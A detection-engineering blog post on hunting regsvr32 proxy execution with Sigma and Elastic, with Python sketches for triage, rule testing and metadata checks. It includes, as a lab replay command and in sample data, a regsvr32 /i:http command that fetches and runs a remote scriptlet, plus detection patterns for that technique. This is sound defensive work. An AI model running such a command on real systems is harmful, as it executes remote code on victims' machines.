Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule
How to turn attack hypotheses into Sigma rules tested in Elastic, with a reproducible lab validation pipeline.
Threat hunting is not staring at pretty dashboards waiting for something to blink red. It starts with an ugly, hand-written hypothesis: 'an attacker used rundll32 to load a DLL from outside C:\Windows'. At Basilisk OffSec we treat every hunt as a small scientific experiment: hypothesis, data collection, query, falsification. When the result is worth keeping, it becomes a Sigma rule versioned in Git. This post walks through the full cycle we run against a Windows 11 lab with Sysmon 15 and Elastic 8.13, from a raw indicator to a detection with a measured false positive rate.
Before writing any rule we need to see real telemetry. We built a lab with three VMs: a Windows 11 host with Sysmon (a modified SwiftOnSecurity config), a minimal Domain Controller built as in our post Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab, and a single-node Elastic deployment with Fleet. To generate controlled malicious behavior we use Caldera with ATT&CK TTPs, as detailed in Adversary Emulation with Caldera and MITRE ATT&CK in a Corporate Lab. Each run produces around 4,000 events per minute, enough to discover that your 'precise rule' is absurdly noisy the moment a user opens Teams.
The hypothesis for this example came from a public report: APT29 used regsvr32 with /s /u /i and an HTTP URL to download a payload. Before turning it into Sigma we validated it in Elastic Discover with KQL: process.name:regsvr32.exe and process.command_line:(*\/i\:http* or *\/i\:\\\\*). We found 12 hits in 7 days, all legitimate (corporate installers). This is the step that separates a hunter from a useless-alert generator: enrich the hits with process.parent.name and file.signature.signed to see what distinguishes legitimate use before writing any rule. Related signed-binary abuse techniques appear in our post Hunting Living-off-the-Land Binaries on Windows with KQL, required reading before going further.
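The enrichment step can be sketched in Python as a grouping of the matching events by parent process and signature flag. This is a minimal sketch under stated assumptions: the sample events, the host names and the parent processes are made up for illustration, and matches_hypothesis is only a rough approximation of the KQL wildcard query, not a replacement for it.

```python
from collections import Counter

# Made-up sample hits, flattened to the fields named in the paragraph above.
SAMPLE_HITS = [
    {"process.name": "regsvr32.exe",
     "process.command_line": "regsvr32 /s /i:http://intranet.example/setup.sct scrobj.dll",
     "process.parent.name": "msiexec.exe", "file.signature.signed": True},
    {"process.name": "regsvr32.exe",
     "process.command_line": "regsvr32 /s /i:\\\\fileserver\\share\\tool.sct scrobj.dll",
     "process.parent.name": "msiexec.exe", "file.signature.signed": True},
    {"process.name": "regsvr32.exe",
     "process.command_line": "regsvr32 /s /u /i:http://10.10.0.5/payload.sct scrobj.dll",
     "process.parent.name": "winword.exe", "file.signature.signed": False},
    {"process.name": "regsvr32.exe",
     "process.command_line": "regsvr32 /s C:\\Windows\\System32\\example.dll",
     "process.parent.name": "explorer.exe", "file.signature.signed": True},
]


def matches_hypothesis(event):
    """Approximate the KQL filter: regsvr32 with /i:http... or /i:\\\\... (UNC)."""
    name = event.get("process.name", "").lower()
    cmd = event.get("process.command_line", "").lower()
    return name == "regsvr32.exe" and ("/i:http" in cmd or "/i:\\\\" in cmd)


def triage(events):
    """Count matching events per (parent process, signed flag) pair."""
    groups = Counter()
    for event in events:
        if matches_hypothesis(event):
            key = (event.get("process.parent.name", "unknown"),
                   event.get("file.signature.signed"))
            groups[key] += 1
    return groups


if __name__ == "__main__":
    for (parent, signed), count in triage(SAMPLE_HITS).most_common():
        print(f"{count:>3}  parent={parent}  signed={signed}")
```

Groups dominated by one signed installer parent are candidates for a filter, while a rare unsigned combination is the part of the hypothesis worth alerting on.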
With the query refined, we translate it to Sigma YAML. The rule ended up with a title, status: experimental, a logsource with category: process_creation and product: windows, and a detection section with selection_img (Image|endswith: '\regsvr32.exe'), selection_cli (CommandLine|contains|all: ['/i:', '://']) and filter_signed (Signed: true) under the condition selection_img and selection_cli and not filter_signed. We convert it with sigma convert -t lucene -p ecs_windows rule.yml and get a query ready for Elastic. This is the same flow we use in the cycle described in Purple Team in Practice: Building a Red vs Blue Feedback Loop, where Red delivers TTPs and Blue returns coverage.
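To make the condition logic concrete, the detection section described above can be mirrored as a Python dictionary and evaluated with a toy matcher. This is an illustrative sketch only: it handles just the endswith, contains and all modifiers used here, it is not how pySigma evaluates or converts rules, and the sample events in the test data are invented.

```python
# Detection section of the rule, mirrored as a dict (same names as in the YAML).
DETECTION = {
    "selection_img": {"Image|endswith": "\\regsvr32.exe"},
    "selection_cli": {"CommandLine|contains|all": ["/i:", "://"]},
    "filter_signed": {"Signed": True},
}


def field_matches(event, key, expected):
    """Evaluate one 'Field|modifier|...' entry, case-insensitively."""
    field, *modifiers = key.split("|")
    actual = str(event.get(field, "")).lower()
    values = expected if isinstance(expected, list) else [expected]
    values = [str(value).lower() for value in values]
    if "endswith" in modifiers:
        checks = [actual.endswith(value) for value in values]
    elif "contains" in modifiers:
        checks = [value in actual for value in values]
    else:
        checks = [actual == value for value in values]
    # 'all' requires every listed value to match; the default is any of them.
    return all(checks) if "all" in modifiers else any(checks)


def block_matches(event, block):
    """All fields inside one selection or filter block must match."""
    return all(field_matches(event, key, value) for key, value in block.items())


def rule_fires(event):
    """condition: selection_img and selection_cli and not filter_signed"""
    return (block_matches(event, DETECTION["selection_img"])
            and block_matches(event, DETECTION["selection_cli"])
            and not block_matches(event, DETECTION["filter_signed"]))
```

Running a handful of hand-built events through rule_fires before conversion is a cheap way to confirm the condition reads the way you intended, for example that a command line with /i: but no :// does not match.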
Testing a Sigma rule without replay is blind faith. We generate real events by running regsvr32 /s /u /i:http://10.10.0.5/payload.sct scrobj.dll inside the lab, capture them with Winlogbeat and measure: time to alert in Elastic Security was 14 seconds, with zero false positives in 72 hours of baseline. When we moved to simulated production (200 endpoints), one FP per day showed up from a McAfee update using /i: with a local path. We tuned the filter to exclude any CommandLine containing C:\Program Files. The same kind of iteration applies to lateral movement detections, covered in Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus.
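The two measurements in this step, time to alert and the effect of the tuned exclusion, can be sketched as follows. The timestamps and the updater command line are hypothetical placeholders (the real McAfee command line is not reproduced here), and the helper names are ours for illustration.

```python
from datetime import datetime

EXCLUDED_PATH = "c:\\program files"  # tuned exclusion, compared case-insensitively
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"

LAB_PAYLOAD = "regsvr32 /s /u /i:http://10.10.0.5/payload.sct scrobj.dll"
# Hypothetical stand-in for the vendor updater that caused the false positive.
UPDATER_PLACEHOLDER = 'regsvr32 /s /i:"C:\\Program Files\\ExampleVendor\\update.ini" example.dll'


def is_excluded(command_line):
    """True when the tuned filter would suppress this command line."""
    return EXCLUDED_PATH in command_line.lower()


def split_alerts(command_lines):
    """Return (kept, suppressed) command lines after applying the exclusion."""
    kept = [c for c in command_lines if not is_excluded(c)]
    suppressed = [c for c in command_lines if is_excluded(c)]
    return kept, suppressed


def time_to_alert_seconds(event_time, alert_time):
    """Seconds between the process event and the alert it produced."""
    started = datetime.strptime(event_time, TIME_FORMAT)
    alerted = datetime.strptime(alert_time, TIME_FORMAT)
    return (alerted - started).total_seconds()
```

A substring exclusion this broad also suppresses any malicious command line that happens to mention the path, so it is worth re-running the replay after tuning to confirm that the lab payload still alerts.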
Documentation kills orphan rules. Every Sigma rule in our repo has custom fields: hypothesis, datasource_required, attack_id (T1218.010), false_positive_rate_observed, last_tested, and a link to the pcap/EVTX used in the test. We version the rules in GitLab with a pipeline that runs sigma check, then sigma convert for Elastic, Splunk and Chronicle, and publishes to Elastic through the Kibana API endpoint detection_engine/rules/_import. If conversion fails, the pipeline breaks. This discipline is what separates a SOC that evolves from one that collects PDFs. For fast DFIR visibility after a hit, we recommend the approach in DFIR on Linux: Live Triage with UAC and Velociraptor, adapted to Windows with KAPE.
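A pipeline stage that enforces those custom fields could look like the sketch below. It assumes the rule has already been parsed into a dictionary; the field name test_evidence for the pcap/EVTX link, the ISO date format for last_tested and the ATT&CK ID pattern are our assumptions for illustration, not part of the Sigma specification or of sigma check.

```python
import re
from datetime import date

# 'test_evidence' is a hypothetical name for the pcap/EVTX link field.
REQUIRED_FIELDS = (
    "hypothesis",
    "datasource_required",
    "attack_id",
    "false_positive_rate_observed",
    "last_tested",
    "test_evidence",
)
# Technique ID with an optional sub-technique, e.g. T1218 or T1218.010.
ATTACK_ID = re.compile(r"^T\d{4}(\.\d{3})?$")


def validate_metadata(rule):
    """Return a list of problems; an empty list means the metadata is complete."""
    problems = [f"missing field: {name}" for name in REQUIRED_FIELDS if name not in rule]
    attack_id = rule.get("attack_id")
    if attack_id is not None and not ATTACK_ID.match(str(attack_id)):
        problems.append(f"malformed attack_id: {attack_id}")
    last_tested = rule.get("last_tested")
    if last_tested is not None:
        try:
            date.fromisoformat(str(last_tested))
        except ValueError:
            problems.append(f"last_tested is not an ISO date: {last_tested}")
    return problems
```

In a CI job, a non-empty result would fail the build in the same way a failed conversion does, so a rule cannot be published without its hypothesis and test evidence attached.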
The practical takeaway: do not write Sigma for indicators you have never seen in your data. Always start by running the TTP in your lab, count the events it generates, count the look-alike legitimate events, and only then write the rule. Our internal goal at Basilisk: no rule reaches production without 7 days of baseline and a measured FP rate below 1 per 10,000 events from the source. Start tomorrow with one small hypothesis, one query, and one YAML. In three months you will have 30 detections that actually work, instead of 300 that only generate fatigue.
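The promotion goal above reduces to a small piece of arithmetic that can sit in the same pipeline. A minimal sketch, assuming you can count false positives and total source events over the baseline window; the function names and the numbers in the usage example are illustrative.

```python
MIN_BASELINE_DAYS = 7
MAX_FP_PER_10K = 1.0


def fp_per_10k(false_positives, total_events):
    """False positives normalized per 10,000 events from the source."""
    if total_events <= 0:
        raise ValueError("total_events must be positive")
    return false_positives * 10_000 / total_events


def ready_for_production(false_positives, total_events, baseline_days):
    """Apply the goal: at least 7 days of baseline and under 1 FP per 10,000 events."""
    return (baseline_days >= MIN_BASELINE_DAYS
            and fp_per_10k(false_positives, total_events) < MAX_FP_PER_10K)


if __name__ == "__main__":
    # Illustrative numbers: 7 false positives over 2,000,000 events in 7 days.
    print(fp_per_10k(7, 2_000_000))
    print(ready_for_production(7, 2_000_000, baseline_days=7))
```

Normalizing by event volume keeps the threshold comparable between a quiet log source and a noisy one, which a raw "FPs per day" figure does not.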